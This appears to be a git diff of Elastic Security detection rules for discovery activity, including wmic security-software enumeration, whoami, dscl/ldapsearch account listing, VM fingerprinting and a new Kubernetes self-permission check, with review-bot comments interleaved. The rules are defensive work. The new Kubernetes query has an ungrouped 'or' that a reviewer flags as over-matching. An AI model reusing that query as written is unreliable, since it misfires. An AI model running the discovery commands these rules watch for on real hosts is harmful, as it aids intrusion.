This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", "query": "process where event.type in (\"start\", \"process_started\") and\n (process.name:\"wmic.exe\" or process.pe.original_file_name:\"wmic.exe\") and\n process.args:\"/namespace:\\\\\\\\root\\\\SecurityCenter2\" and process.args:\"Get\"\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "6ea55c81-e2ba-42f2-a134-bccf857ba922", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -50,5 +73,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 6 + "version": 8 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_suspicious_self_subject_review.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_suspicious_self_subject_review.json new file mode 100644 index 0000000000000..b001aea3b04fe --- /dev/null +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_suspicious_self_subject_review.json 
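Review bot: The `+ "note"` line keeps the phrase `with arguments compatible to the enumeration of the security software installed on the host`; "compatible to" is not idiomatic and the sentence reads more clearly as `with arguments consistent with enumerating the security software installed on the host`. Since the note is rewritten in this hunk, this is the right place to fix the wording. The added `required_fields` and `setup` entries look consistent with the other rules in the commit.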
@@ -0,0 +1,74 @@ +{ + "author": [ + "Elastic" + ], + "description": "This rule detects when a service account or node attempts to enumerate their own permissions via the selfsubjectaccessreview or selfsubjectrulesreview APIs. This is highly unusual behavior for non-human identities like service accounts and nodes. An adversary may have gained access to credentials/tokens and this could be an attempt to determine what privileges they have to facilitate further movement or execution within the cluster.", + "false_positives": [ + "An administrator may submit this request as an \"impersonatedUser\" to determine what privileges a particular service account has been granted. However, an adversary may utilize the same technique as a means to determine the privileges of another token other than that of the compromised account." + ], + "index": [ + "logs-kubernetes.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Kubernetes Suspicious Self-Subject Review", + "note": "", + "query": "kubernetes.audit.verb:\"create\" \nand kubernetes.audit.objectRef.resource:(\"selfsubjectaccessreviews\" or \"selfsubjectrulesreviews\") \nand kubernetes.audit.user.username:(system\\:serviceaccount\\:* or system\\:node\\:*) or kubernetes.audit.impersonatedUser.username:(system\\:serviceaccount\\:* or system\\:node\\:*)\n", + "references": [ + "https://www.paloaltonetworks.com/apps/pan/public/downloadResource?pagePath=/content/pan/en_US/resources/whitepapers/kubernetes-privilege-escalation-excessive-permissions-in-popular-platforms", + "https://kubernetes.io/docs/reference/access-authn-authz/authorization/#checking-api-access", + "https://techcommunity.microsoft.com/t5/microsoft-defender-for-cloud/detecting-identity-attacks-in-kubernetes/ba-p/3232340" + ], + "required_fields": [ + { + "ecs": false, + "name": "kubernetes.audit.impersonatedUser.username", + "type": "unknown" + }, + { + "ecs": false, + "name": "kubernetes.audit.objectRef.resource", + "type": "unknown" + 
}, + { + "ecs": false, + "name": "kubernetes.audit.user.username", + "type": "unknown" + }, + { + "ecs": false, + "name": "kubernetes.audit.verb", + "type": "unknown" + } + ], + "risk_score": 47, + "rule_id": "12a2f15d-597e-4334-88ff-38a02cb1330b", + "setup": "The Kubernetes Fleet integration with Audit Logs enabled or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Elastic", + "Kubernetes", + "Continuous Monitoring", + "Discovery" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1613", + "name": "Container and Resource Discovery", + "reference": "https://attack.mitre.org/techniques/T1613/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 2 +} diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_users_domain_built_in_commands.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_users_domain_built_in_commands.json index 7152bb4c93d3d..aaccb3f6163ee 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_users_domain_built_in_commands.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_users_domain_built_in_commands.json @@ -2,7 +2,7 @@ "author": [ "Elastic" ], - "description": "Identifies the execution of macOS built-in commands related to account or group enumeration.", + "description": "Identifies the execution of macOS built-in commands related to account or group enumeration. Adversaries may use account and group information to orient themselves before deciding how to act.", "from": "now-9m", "index": [ "auditbeat-*", 
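Review bot: The `+ "query"` of the new rule mixes `and` and `or` without parentheses, and KQL gives `and` higher precedence than `or`, so the trailing `or kubernetes.audit.impersonatedUser.username:(...)` branch matches any audit event that impersonates a service account or node regardless of `kubernetes.audit.verb` or `objectRef.resource`; the rule will fire on ordinary impersonated requests, and the self-subject-review intent in `description` only holds for the first branch. Group the two identity checks so both are constrained by the verb and resource: `and (kubernetes.audit.user.username:(system\\:serviceaccount\\:* or system\\:node\\:*) or kubernetes.audit.impersonatedUser.username:(system\\:serviceaccount\\:* or system\\:node\\:*))`. The `+ "note": ""` also leaves the rule without triage guidance even though `false_positives` already describes the impersonatedUser case an analyst would have to distinguish; a short note covering how to check `kubernetes.audit.user.username` against `impersonatedUser.username` would help.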
@@ -11,10 +11,33 @@ "language": "eql", "license": "Elastic License v2", "name": "Enumeration of Users or Groups via Built-in Commands", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", - "query": "process where event.type in (\"start\", \"process_started\") and\n not process.parent.executable : (\"/Applications/NoMAD.app/Contents/MacOS/NoMAD\", \n \"/Applications/ZoomPresence.app/Contents/MacOS/ZoomPresence\",\n \"/Applications/Sourcetree.app/Contents/MacOS/Sourcetree\",\n \"/Library/Application Support/JAMF/Jamf.app/Contents/MacOS/JamfDaemon.app/Contents/MacOS/JamfDaemon\",\n \"/Applications/Jamf Connect.app/Contents/MacOS/Jamf Connect\",\n \"/usr/local/jamf/bin/jamf\"\n ) and \n process.name : (\"ldapsearch\", \"dsmemberutil\") or\n (process.name : \"dscl\" and \n process.args : (\"read\", \"-read\", \"list\", \"-list\", \"ls\", \"search\", \"-search\") and \n process.args : (\"/Active Directory/*\", \"/Users*\", \"/Groups*\"))\n", + "note": "", + "query": "process where event.type in (\"start\", \"process_started\") and\n (\n process.name : (\"ldapsearch\", \"dsmemberutil\") or\n (process.name : \"dscl\" and\n process.args : (\"read\", \"-read\", \"list\", \"-list\", \"ls\", \"search\", \"-search\") and\n process.args : (\"/Active Directory/*\", \"/Users*\", \"/Groups*\"))\n\t) and\n not process.parent.executable : (\"/Applications/NoMAD.app/Contents/MacOS/NoMAD\",\n \"/Applications/ZoomPresence.app/Contents/MacOS/ZoomPresence\",\n \"/Applications/Sourcetree.app/Contents/MacOS/Sourcetree\",\n \"/Library/Application Support/JAMF/Jamf.app/Contents/MacOS/JamfDaemon.app/Contents/MacOS/JamfDaemon\",\n \"/Applications/Jamf Connect.app/Contents/MacOS/Jamf Connect\",\n \"/usr/local/jamf/bin/jamf\",\n 
\"/Library/Application Support/AirWatch/hubd\",\n \"/opt/jc/bin/jumpcloud-agent\",\n \"/Applications/ESET Endpoint Antivirus.app/Contents/MacOS/esets_daemon\",\n \"/Applications/ESET Endpoint Security.app/Contents/MacOS/esets_daemon\",\n \"/Library/PrivilegedHelperTools/com.fortinet.forticlient.uninstall_helper\"\n )\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.executable", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "6e9b351e-a531-4bdc-b73e-7034d6eed7ff", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Elastic", @@ -47,5 +70,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 3 + "version": 5 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_virtual_machine_fingerprinting.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_virtual_machine_fingerprinting.json index 09adcdc65b02a..b8b22c1db44bc 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_virtual_machine_fingerprinting.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_virtual_machine_fingerprinting.json 
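Review bot: The rewritten `query` string mixes a literal tab into an otherwise space-indented multi-line expression (`\n\t) and\n`, closing the new `(` … `)` group). EQL ignores the whitespace, but the query text is shown verbatim in the rule UI and every other line in the string uses spaces, so `\n ) and\n` would keep the indentation consistent with the rest of the query and with the other rules touched in this commit.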
@@ -15,6 +15,28 @@
 "license": "Elastic License v2",
 "name": "Virtual Machine Fingerprinting",
 "query": "event.category:process and event.type:(start or process_started) and\n process.args:(\"/sys/class/dmi/id/bios_version\" or\n \"/sys/class/dmi/id/product_name\" or\n \"/sys/class/dmi/id/chassis_vendor\" or\n \"/proc/scsi/scsi\" or\n \"/proc/ide/hd0/model\") and\n not user.name:root\n",
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.category",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.args",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "user.name",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 73,
 "rule_id": "5b03c9fb-9945-4d2f-9568-fd690fee3fba",
 "severity": "high",
@@ -44,5 +66,5 @@
 ],
 "timestamp_override": "event.ingested",
 "type": "query",
- "version": 6
+ "version": 7
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_virtual_machine_fingerprinting_grep.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_virtual_machine_fingerprinting_grep.json
index 009cdf49ab28b..59ab4b117e62a 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_virtual_machine_fingerprinting_grep.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_virtual_machine_fingerprinting_grep.json
@@ -14,13 +14,41 @@
 "language": "eql",
 "license": "Elastic License v2",
 "name": "Virtual Machine Fingerprinting via Grep",
- "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n",
- "query": "process where event.type == \"start\" and\n process.name in (\"grep\", \"egrep\") and user.id != \"0\" and\n process.args : (\"parallels*\", \"vmware*\", \"virtualbox*\") and process.args : \"Manufacturer*\" and \n not process.parent.executable in (\"/Applications/Docker.app/Contents/MacOS/Docker\", \"/usr/libexec/kcare/virt-what\")\n",
+ "note": "",
+ "query": "process where event.type == \"start\" and\n process.name in (\"grep\", \"egrep\") and user.id != \"0\" and\n process.args : (\"parallels*\", \"vmware*\", \"virtualbox*\") and process.args : \"Manufacturer*\" and\n not process.parent.executable in (\"/Applications/Docker.app/Contents/MacOS/Docker\", \"/usr/libexec/kcare/virt-what\")\n",
 "references": [
 "https://objective-see.com/blog/blog_0x4F.html"
 ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.args",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.name",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.parent.executable",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "user.id",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 47,
 "rule_id": "c85eb82c-d2c8-485c-a36f-534f914b7663",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
"severity": "medium",
 "tags": [
 "Elastic",
@@ -49,5 +77,5 @@
 ],
 "timestamp_override": "event.ingested",
 "type": "eql",
- "version": 2
+ "version": 4
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_whoami_command_activity.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_whoami_command_activity.json
index 1ec25bb00b392..b4363af45722e 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_whoami_command_activity.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_whoami_command_activity.json
@@ -16,10 +16,23 @@ "language": "eql", "license": "Elastic License v2", "name": "Whoami Process Activity", - "note": "## Triage and analysis\n\n### Investigating Whoami Process Activity\n\nAfter successfully compromising an environment, attackers may try to gain situational awareness to plan their next steps.\nThis can happen by running commands to enumerate network resources, users, connections, files, and installed security\nsoftware.\n\nThis rule looks for the execution of the `whoami` utility. Attackers commonly use this utility to measure their current\nprivileges, discover the current user, determine if a privilege escalation was successful, etc.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate abnormal behaviors observed using the account, such as commands executed, files created or modified, and\nnetwork connections.\n\n### False positive analysis\n\n- Discovery activities are not inherently malicious if they occur in isolation. As long as the analyst did not identify\nsuspicious activity related to the user or host, such alerts can be dismissed.\n\n### Related rules\n\n- Account Discovery Command via SYSTEM Account - 2856446a-34e6-435b-9fb5-f8f040bfa7ed\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "## Triage and analysis\n\n### Investigating Whoami Process Activity\n\nAfter successfully compromising an environment, attackers may try to gain situational awareness to plan their next steps.\nThis can happen by running commands to enumerate network resources, users, connections, files, and installed security\nsoftware.\n\nThis rule looks for the execution of the `whoami` utility. Attackers commonly use this utility to measure their current\nprivileges, discover the current user, determine if a privilege escalation was successful, etc.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate abnormal behaviors observed using the account, such as commands executed, files created or modified, and\nnetwork connections.\n\n### False positive analysis\n\n- Discovery activities are not inherently malicious if they occur in isolation. As long as the analyst did not identify\nsuspicious activity related to the user or host, such alerts can be dismissed.\n\n### Related rules\n\n- Account Discovery Command via SYSTEM Account - 2856446a-34e6-435b-9fb5-f8f040bfa7ed\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", "query": "process where event.type in (\"start\", \"process_started\") and process.name : \"whoami.exe\"\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "ef862985-3f13-4262-a686-5f357bbb9bc2", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Elastic", @@ -47,5 +60,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 9 + "version": 11 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/domain_added_to_google_workspace_trusted_domains.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/domain_added_to_google_workspace_trusted_domains.json deleted file mode 100644 index 26d8afd697d00..0000000000000 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/domain_added_to_google_workspace_trusted_domains.json +++ /dev/null 
@@ -1,37 +0,0 @@ -{ - "author": [ - "Elastic" - ], - "description": "Detects when a domain is added to the list of trusted Google Workspace domains. An adversary may add a trusted domain in order to collect and exfiltrate data from their target\u2019s organization with less restrictive security controls.", - "false_positives": [ - "Trusted domains may be added by system administrators. Verify that the configuration change was expected. Exceptions can be added to this rule to filter expected behavior." - ], - "from": "now-130m", - "index": [ - "filebeat-*", - "logs-google_workspace*" - ], - "interval": "10m", - "language": "kuery", - "license": "Elastic License v2", - "name": "Domain Added to Google Workspace Trusted Domains", - "note": "## Config\n\nThe Google Workspace Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.\n\n### Important Information Regarding Google Workspace Event Lag Times\n- As per Google's documentation, Google Workspace administrators may observe lag times ranging from minutes up to 3 days between the time of an event's occurrence and the event being visible in the Google Workspace admin/audit logs.\n- This rule is configured to run every 10 minutes with a lookback time of 130 minutes.\n- To reduce the risk of false negatives, consider reducing the interval that the Google Workspace (formerly G Suite) Filebeat module polls Google's reporting API for new events.\n- By default, `var.interval` is set to 2 hours (2h). 
Consider changing this interval to a lower value, such as 10 minutes (10m).\n- See the following references for further information:\n - https://support.google.com/a/answer/7061566\n - https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-google_workspace.html", - "query": "event.dataset:google_workspace.admin and event.provider:admin and event.category:iam and event.action:ADD_TRUSTED_DOMAINS\n", - "references": [ - "https://support.google.com/a/answer/6160020?hl=en" - ], - "risk_score": 73, - "rule_id": "cf549724-c577-4fd6-8f9b-d1b8ec519ec0", - "severity": "high", - "tags": [ - "Elastic", - "Cloud", - "Google Workspace", - "Continuous Monitoring", - "SecOps", - "Configuration Audit" - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 12 -} diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/elastic_endpoint_security.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/elastic_endpoint_security.json index 63bf6fea698ae..c203110a79cd5 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/elastic_endpoint_security.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/elastic_endpoint_security.json @@ -21,6 +21,18 @@ "max_signals": 10000, "name": "Endpoint Security", "query": "event.kind:alert and event.module:(endpoint and not endgame)\n", + "required_fields": [ + { + "ecs": true, + "name": "event.kind", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.module", + "type": "keyword" + } + ], "risk_score": 47, "risk_score_mapping": [ { @@ -64,5 +76,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 3 + "version": 4 } 
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/endgame_adversary_behavior_detected.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/endgame_adversary_behavior_detected.json
index abe19ac7e0a69..cca6142f3e4b8 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/endgame_adversary_behavior_detected.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/endgame_adversary_behavior_detected.json
@@ -13,6 +13,28 @@
 "max_signals": 10000,
 "name": "Adversary Behavior - Detected - Elastic Endgame",
 "query": "event.kind:alert and event.module:endgame and (event.action:rules_engine_event or endgame.event_subtype_full:rules_engine_event)\n",
+ "required_fields": [
+ {
+ "ecs": false,
+ "name": "endgame.event_subtype_full",
+ "type": "unknown"
+ },
+ {
+ "ecs": true,
+ "name": "event.action",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.kind",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.module",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 47,
 "rule_id": "77a3c3df-8ec4-4da4-b758-878f551dee69",
 "severity": "medium",
@@ -21,5 +43,5 @@
 "Elastic Endgame"
 ],
 "type": "query",
- "version": 7
+ "version": 8
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/endgame_cred_dumping_detected.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/endgame_cred_dumping_detected.json
deleted file mode 100644
index d08d5cdc79ba0..0000000000000
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/endgame_cred_dumping_detected.json
+++ /dev/null
@@ -1,25 +0,0 @@
-{
- "author": [
- "Elastic"
- ],
- "description": "Elastic Endgame detected Credential Dumping. Click the Elastic Endgame icon in the event.module column or the link in the rule.reference column for additional information.",
- "from": "now-15m",
- "index": [
- "endgame-*"
- ],
- "interval": "10m",
- "language": "kuery",
- "license": "Elastic License v2",
- "max_signals": 10000,
- "name": "Credential Dumping - Detected - Elastic Endgame",
- "query": "event.kind:alert and event.module:endgame and endgame.metadata.type:detection and (event.action:cred_theft_event or endgame.event_subtype_full:cred_theft_event)\n",
- "risk_score": 73,
- "rule_id": "571afc56-5ed9-465d-a2a9-045f099f6e7e",
- "severity": "high",
- "tags": [
- "Elastic",
- "Elastic Endgame"
- ],
- "type": "query",
- "version": 7
-}
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/endgame_cred_dumping_prevented.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/endgame_cred_dumping_prevented.json
deleted file mode 100644
index 48159cfc3a07f..0000000000000
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/endgame_cred_dumping_prevented.json
+++ /dev/null
@@ -1,25 +0,0 @@
-{
- "author": [
- "Elastic"
- ],
- "description": "Elastic Endgame prevented Credential Dumping. Click the Elastic Endgame icon in the event.module column or the link in the rule.reference column for additional information.",
- "from": "now-15m",
- "index": [
- "endgame-*"
- ],
- "interval": "10m",
- "language": "kuery",
- "license": "Elastic License v2",
- "max_signals": 10000,
- "name": "Credential Dumping - Prevented - Elastic Endgame",
- "query": "event.kind:alert and event.module:endgame and endgame.metadata.type:prevention and (event.action:cred_theft_event or endgame.event_subtype_full:cred_theft_event)\n",
- "risk_score": 47,
- "rule_id": "db8c33a8-03cd-4988-9e2c-d0a4863adb13",
- "severity": "medium",
- "tags": [
- "Elastic",
- "Elastic Endgame"
- ],
- "type": "query",
- "version": 7
-}
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/endgame_cred_manipulation_detected.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/endgame_cred_manipulation_detected.json
deleted file mode 100644
index 30a94c67f9999..0000000000000
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/endgame_cred_manipulation_detected.json
+++ /dev/null
@@ -1,25 +0,0 @@
-{
- "author": [
- "Elastic"
- ],
- "description": "Elastic Endgame detected Credential Manipulation. Click the Elastic Endgame icon in the event.module column or the link in the rule.reference column for additional information.",
- "from": "now-15m",
- "index": [
- "endgame-*"
- ],
- "interval": "10m",
- "language": "kuery",
- "license": "Elastic License v2",
- "max_signals": 10000,
- "name": "Credential Manipulation - Detected - Elastic Endgame",
- "query": "event.kind:alert and event.module:endgame and endgame.metadata.type:detection and (event.action:token_manipulation_event or endgame.event_subtype_full:token_manipulation_event)\n",
- "risk_score": 73,
- "rule_id": "c0be5f31-e180-48ed-aa08-96b36899d48f",
- "severity": "high",
- "tags": [
- "Elastic",
- "Elastic Endgame"
- ],
- "type": "query",
- "version": 7
-}
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/endgame_cred_manipulation_prevented.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/endgame_cred_manipulation_prevented.json
deleted file mode 100644
index cbacfb8310a93..0000000000000
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/endgame_cred_manipulation_prevented.json
+++ /dev/null
@@ -1,25 +0,0 @@
-{
- "author": [
- "Elastic"
- ],
- "description": "Elastic Endgame prevented Credential Manipulation. Click the Elastic Endgame icon in the event.module column or the link in the rule.reference column for additional information.",
- "from": "now-15m",
- "index": [
- "endgame-*"
- ],
- "interval": "10m",
- "language": "kuery",
- "license": "Elastic License v2",
- "max_signals": 10000,
- "name": "Credential Manipulation - Prevented - Elastic Endgame",
- "query": "event.kind:alert and event.module:endgame and endgame.metadata.type:prevention and (event.action:token_manipulation_event or endgame.event_subtype_full:token_manipulation_event)\n",
- "risk_score": 47,
- "rule_id": "c9e38e64-3f4c-4bf3-ad48-0e61a60ea1fa",
- "severity": "medium",
- "tags": [
- "Elastic",
- "Elastic Endgame"
- ],
- "type": "query",
- "version": 7
-}
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/endgame_exploit_detected.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/endgame_exploit_detected.json
deleted file mode 100644
index 51151f3ad264f..0000000000000
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/endgame_exploit_detected.json
+++ /dev/null
@@ -1,25 +0,0 @@
-{
- "author": [
- "Elastic"
- ],
- "description": "Elastic Endgame detected an Exploit. Click the Elastic Endgame icon in the event.module column or the link in the rule.reference column for additional information.",
- "from": "now-15m",
- "index": [
- "endgame-*"
- ],
- "interval": "10m",
- "language": "kuery",
- "license": "Elastic License v2",
- "max_signals": 10000,
- "name": "Exploit - Detected - Elastic Endgame",
- "query": "event.kind:alert and event.module:endgame and endgame.metadata.type:detection and (event.action:exploit_event or endgame.event_subtype_full:exploit_event)\n",
- "risk_score": 73,
- "rule_id": "2003cdc8-8d83-4aa5-b132-1f9a8eb48514",
- "severity": "high",
- "tags": [
- "Elastic",
- "Elastic Endgame"
- ],
- "type": "query",
- "version": 7
-}
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/endgame_exploit_prevented.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/endgame_exploit_prevented.json
deleted file mode 100644
index 44e13fc83f15a..0000000000000
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/endgame_exploit_prevented.json
+++ /dev/null
@@ -1,25 +0,0 @@
-{
- "author": [
- "Elastic"
- ],
- "description": "Elastic Endgame prevented an Exploit. Click the Elastic Endgame icon in the event.module column or the link in the rule.reference column for additional information.",
- "from": "now-15m",
- "index": [
- "endgame-*"
- ],
- "interval": "10m",
- "language": "kuery",
- "license": "Elastic License v2",
- "max_signals": 10000,
- "name": "Exploit - Prevented - Elastic Endgame",
- "query": "event.kind:alert and event.module:endgame and endgame.metadata.type:prevention and (event.action:exploit_event or endgame.event_subtype_full:exploit_event)\n",
- "risk_score": 47,
- "rule_id": "2863ffeb-bf77-44dd-b7a5-93ef94b72036",
- "severity": "medium",
- "tags": [
- "Elastic",
- "Elastic Endgame"
- ],
- "type": "query",
- "version": 7
-}
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/endgame_malware_detected.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/endgame_malware_detected.json
index 7e375f9aca154..60d6ee9fddaf0 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/endgame_malware_detected.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/endgame_malware_detected.json
@@ -13,6 +13,33 @@
 "max_signals": 10000,
